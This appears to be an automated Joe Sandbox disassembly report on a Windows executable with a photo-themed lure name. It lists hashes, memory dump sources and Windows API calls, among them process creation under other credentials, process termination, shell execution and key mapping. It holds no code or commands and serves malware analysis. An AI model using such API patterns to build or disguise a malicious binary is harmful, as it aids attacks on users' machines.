                                                                      • Instruction ID: 69e4cfbeeba9000a9d65c98a4879a6dbb894f26b4a50da2a05179d38d534e91c
                                                                      • Opcode Fuzzy Hash: 4ad6e2ae47e5c45ade701094b002e773626d9799e74811b84bf6f811b68ac181
                                                                      • Instruction Fuzzy Hash: 17219071724351AFCB249F38CC88A6A37A5FB47335F185629F926D62E0DB309950CB30
                                                                      APIs
                                                                        • Part of subcall function 00D70EF8: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D70F0E
                                                                        • Part of subcall function 00D70EF8: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D70F1A
                                                                        • Part of subcall function 00D70EF8: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D70F29
                                                                        • Part of subcall function 00D70EF8: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D70F30
                                                                        • Part of subcall function 00D70EF8: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D70F46
                                                                      • GetLengthSid.ADVAPI32(?,00000000,00D71279), ref: 00D716F2
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D716FE
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00D71705
                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00D7171E
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00D71279), ref: 00D71732
                                                                      • HeapFree.KERNEL32(00000000), ref: 00D71739
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                      • String ID:
                                                                      • API String ID: 3008561057-0
                                                                      • Opcode ID: 42afb164e60169275057783540ddc59e155d676bb9b3afae1d047b3d0c21ce69
                                                                      • Instruction ID: dd58dda69110100babc6fd03ad7b898cc87e0383165592b8def8729dec3fbb94
                                                                      • Opcode Fuzzy Hash: 42afb164e60169275057783540ddc59e155d676bb9b3afae1d047b3d0c21ce69
                                                                      • Instruction Fuzzy Hash: 1C11B136610304FFDB149F68CC49BAE7BB8FB46365F148118E446E7210E7319901CB70
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00D71443
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00D7144A
                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00D71459
                                                                      • CloseHandle.KERNEL32(00000004), ref: 00D71464
                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D71493
                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00D714A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                      • String ID:
                                                                      • API String ID: 1413079979-0
                                                                      • Opcode ID: 03b8a80acb01cdcfdcaca41cb4da8a59070935997e47f02a2ea3179879008ad8
                                                                      • Instruction ID: bd1a08938cd3b3b98aef206ddac532808c48ea48229a7f15d3aaf3f0e803d001
                                                                      • Opcode Fuzzy Hash: 03b8a80acb01cdcfdcaca41cb4da8a59070935997e47f02a2ea3179879008ad8
                                                                      • Instruction Fuzzy Hash: E211267650020DABDF118FA8ED49FDE7BA9EF09718F188125FA04A2160D375CE64DB70
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,00D33309,00D32F75), ref: 00D33320
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D3332E
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D33347
                                                                      • SetLastError.KERNEL32(00000000,?,00D33309,00D32F75), ref: 00D33399
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      • Opcode ID: def631ff3e12cce4024da7773e096a825b37eed0f182d65c2c835e4fba19413f
                                                                      • Instruction ID: 3adab73704da7d49e588b627eebedc9aa3a8751a26a2d3371517e13bcf8a01d8
                                                                      • Opcode Fuzzy Hash: def631ff3e12cce4024da7773e096a825b37eed0f182d65c2c835e4fba19413f
                                                                      • Instruction Fuzzy Hash: E701F733A2E312AFAB2427757E86B7B6794EB06776F24823AF010C52F0EF114D019174
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,00D34973,?,?,?,00D36502,?,?,?,?), ref: 00D42D08
                                                                      • _free.LIBCMT ref: 00D42D3B
                                                                      • _free.LIBCMT ref: 00D42D63
                                                                      • SetLastError.KERNEL32(00000000,?,?,?), ref: 00D42D70
                                                                      • SetLastError.KERNEL32(00000000,?,?,?), ref: 00D42D7C
                                                                      • _abort.LIBCMT ref: 00D42D82
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free$_abort
                                                                      • String ID:
                                                                      • API String ID: 3160817290-0
                                                                      • Opcode ID: 8ae77f20842d5d99da48b55ac2576f6849101e3ed06331bc18c828e15bea2e9c
                                                                      • Instruction ID: 491acd5f07db673a16685bd201302992e9b9b605562b9fedd8b943fe17d8d288
                                                                      • Opcode Fuzzy Hash: 8ae77f20842d5d99da48b55ac2576f6849101e3ed06331bc18c828e15bea2e9c
                                                                      • Instruction Fuzzy Hash: 2AF0C832A41B0167CA227738AC4AB3A2669EFC27B0F694515F424D22D1EF74894281B0
                                                                      APIs
                                                                        • Part of subcall function 00D2AABF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D2AB19
                                                                        • Part of subcall function 00D2AABF: SelectObject.GDI32(?,00000000), ref: 00D2AB28
                                                                        • Part of subcall function 00D2AABF: BeginPath.GDI32(?), ref: 00D2AB3F
                                                                        • Part of subcall function 00D2AABF: SelectObject.GDI32(?,00000000), ref: 00D2AB68
                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00DA8940
                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00DA8954
                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00DA8962
                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00DA8972
                                                                      • EndPath.GDI32(?), ref: 00DA8982
                                                                      • StrokePath.GDI32(?), ref: 00DA8992
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                      • String ID:
                                                                      • API String ID: 43455801-0
                                                                      • Opcode ID: ca28e38cfd6e99e05314b22156187ab1208a2e500b2f12fe135f78ff13e61cc9
                                                                      • Instruction ID: a4f3b68884f64631011f909a519662495809e5b24e2b86f678a0ec24dad5ebe9
                                                                      • Opcode Fuzzy Hash: ca28e38cfd6e99e05314b22156187ab1208a2e500b2f12fe135f78ff13e61cc9
                                                                      • Instruction Fuzzy Hash: DD110976040248FFDB029F94DC88EAA7F6DEB093A4F048011FA199A2A1C7719D55DFB0
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 00D7516E
                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D7517F
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D75186
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00D7518E
                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00D751A5
                                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00D751B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      • Opcode ID: 1d121e2c007933351defa97931af7e06a532d17e5ef86e39e40d6f8be79e6020
                                                                      • Instruction ID: 0c0bc8002ee687e4bbd1934fd13d1be817fee4243043fe396cb93b9663241a25
                                                                      • Opcode Fuzzy Hash: 1d121e2c007933351defa97931af7e06a532d17e5ef86e39e40d6f8be79e6020
                                                                      • Instruction Fuzzy Hash: 9F017C75A40708BBEB109BA59C49A4ABFA8EB49761F044066FA04E7391E6709800CBA0
                                                                      APIs
                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D134FF
                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00D13507
                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D13512
                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D1351D
                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00D13525
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D1352D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual
                                                                      • String ID:
                                                                      • API String ID: 4278518827-0
                                                                      • Opcode ID: 6718693528771e5652ed0881b9e088b794827e2e25fd8ab59bfa9b068d203e53
                                                                      • Instruction ID: e6fc5eea723daaca53ddd8a7ba9449f6ea9bee5bf63fdc8d415c6d46896ce233
                                                                      • Opcode Fuzzy Hash: 6718693528771e5652ed0881b9e088b794827e2e25fd8ab59bfa9b068d203e53
                                                                      • Instruction Fuzzy Hash: E2016CB09027597DE3008F5A8C85B52FFE8FF19354F04411B915C47A41C7F5A864CBE5
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00D7EA4E
                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00D7EA64
                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00D7EA73
                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D7EA82
                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D7EA8C
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D7EA93
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 839392675-0
                                                                      • Opcode ID: 2aabfb6234a082e0cf2366d9ae38a048b4424910bc4df87e7980cb3f04e3eeb9
                                                                      • Instruction ID: 713a63888736b99f4f49f67ee08e03063a3e3832dd7f4e5ce5413da9036f9256
                                                                      • Opcode Fuzzy Hash: 2aabfb6234a082e0cf2366d9ae38a048b4424910bc4df87e7980cb3f04e3eeb9
                                                                      • Instruction Fuzzy Hash: A4F05472250658BBE7215B529C0EEEF3F7CEFCBB21F045158F601D1291D7A05A01C6B5
                                                                      APIs
                                                                      • GetClientRect.USER32(?), ref: 00D67E0F
                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00D67E26
                                                                      • GetWindowDC.USER32(?), ref: 00D67E32
                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00D67E41
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00D67E53
                                                                      • GetSysColor.USER32(00000005), ref: 00D67E6D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                      • String ID:
                                                                      • API String ID: 272304278-0
                                                                      • Opcode ID: a5bccdad7d101fd30269ed41d4ddfbe1f59fbb571b23d86b4ae6842a5ae62353
                                                                      • Instruction ID: 71a8082bc1a1c4625919a4e6dd6411920c069c676408fc1d9c71d1d65a9956c0
                                                                      • Opcode Fuzzy Hash: a5bccdad7d101fd30269ed41d4ddfbe1f59fbb571b23d86b4ae6842a5ae62353
                                                                      • Instruction Fuzzy Hash: 2D014B31510316EFDB50AB64DC08BEA7BB6FB05321F641560F915E22B1CB321D51EF20
                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D717C3
                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00D717CF
                                                                      • CloseHandle.KERNEL32(?), ref: 00D717D8
                                                                      • CloseHandle.KERNEL32(?), ref: 00D717E0
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00D717E9
                                                                      • HeapFree.KERNEL32(00000000), ref: 00D717F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                      • String ID:
                                                                      • API String ID: 146765662-0
                                                                      • Opcode ID: 9ea8839fb54e725a45fb7670254b62c52d87b372d92417ff2136156f83435ef6
                                                                      • Instruction ID: d919de55bc40694fa168d7987d2d8121804e4ba1088447752351eece1dc5ae1d
                                                                      • Opcode Fuzzy Hash: 9ea8839fb54e725a45fb7670254b62c52d87b372d92417ff2136156f83435ef6
                                                                      • Instruction Fuzzy Hash: B9E0E536214305BBDB011FA1EC0C90ABF79FF5AB32B109220F225C1270CB329421DF60
                                                                      APIs
                                                                        • Part of subcall function 00D18FA0: _wcslen.LIBCMT ref: 00D18FA5
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00D7C60C
                                                                      • _wcslen.LIBCMT ref: 00D7C653
                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00D7C6BA
                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00D7C6E8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                                      • String ID: 0
                                                                      • API String ID: 1227352736-4108050209
                                                                      • Opcode ID: b4763674a2dc2ee0ef951f9919cac0d10c95b05515c90d951dba980d7a412edb
                                                                      • Instruction ID: 6ca4647d7f401425649f4fb3e3192e2d7cef8aebda382506c1b8adb3959b4b04
                                                                      • Opcode Fuzzy Hash: b4763674a2dc2ee0ef951f9919cac0d10c95b05515c90d951dba980d7a412edb
                                                                      • Instruction Fuzzy Hash: 9351EE716283409FC7149F28D885B6F77E4EB89314F08AA2DF899D71A0FB70D9448B72
                                                                      APIs
                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00D9ADCA
                                                                        • Part of subcall function 00D18FA0: _wcslen.LIBCMT ref: 00D18FA5
                                                                      • GetProcessId.KERNEL32(00000000), ref: 00D9AE5F
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D9AE8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                      • String ID: <$@
                                                                      • API String ID: 146682121-1426351568
                                                                      • Opcode ID: 833063aeffcbcaf5a7242d70924c1c9e1a91dcbed93d44fdcbf36729432289f0
                                                                      • Instruction ID: f8c1ee2e3650e764aa701c20311c6737d8a4ff1e2418669af00f3f837381e215
                                                                      • Opcode Fuzzy Hash: 833063aeffcbcaf5a7242d70924c1c9e1a91dcbed93d44fdcbf36729432289f0
                                                                      • Instruction Fuzzy Hash: B5714575A00219EFCF14DF98D484A9EBBF0EF48314F048499E815AB252CB74AD81CBB1
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00D7715C
                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00D77192
                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00D771A3
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00D77225
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                      • String ID: DllGetClassObject
                                                                      • API String ID: 753597075-1075368562
                                                                      • Opcode ID: 5e118482b24e1bacba7fad9ee301d245e34230ea14f825d12e470e2ecdc45ce0
                                                                      • Instruction ID: cfe2182ae407055dba1578b8a8e13adc02ca65228797dd3aad36ce11815491fb
                                                                      • Opcode Fuzzy Hash: 5e118482b24e1bacba7fad9ee301d245e34230ea14f825d12e470e2ecdc45ce0
                                                                      • Instruction Fuzzy Hash: 244149B1604304EFDF15CFA4C884AAA7BA9EF45310B1489A9BD199F206E7B1D944DBB0
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DA3D68
                                                                      • IsMenu.USER32(?), ref: 00DA3D7D
                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DA3DC5
                                                                      • DrawMenuBar.USER32 ref: 00DA3DD8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                      • String ID: 0
                                                                      • API String ID: 3076010158-4108050209
                                                                      • Opcode ID: f7fa771623bcd712aea66e6c22114edbc958c72975ca3e0fc41e6ddd8dc808e6
                                                                      • Instruction ID: 33001f95dbbc0362fe286b162f54c2ad657409da571270f0fc5153e1f0a691d4
                                                                      • Opcode Fuzzy Hash: f7fa771623bcd712aea66e6c22114edbc958c72975ca3e0fc41e6ddd8dc808e6
                                                                      • Instruction Fuzzy Hash: 12412775A01209EFDF10DF50E884AAABBB6FF06364F184129F955AB350D735AE40CB60
                                                                      APIs
                                                                        • Part of subcall function 00D1B606: _wcslen.LIBCMT ref: 00D1B610
                                                                        • Part of subcall function 00D73BEF: GetClassNameW.USER32(?,?,000000FF), ref: 00D73C12
                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00D71DAA
                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00D71DBD
                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00D71DED
                                                                        • Part of subcall function 00D184E7: _wcslen.LIBCMT ref: 00D184FA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
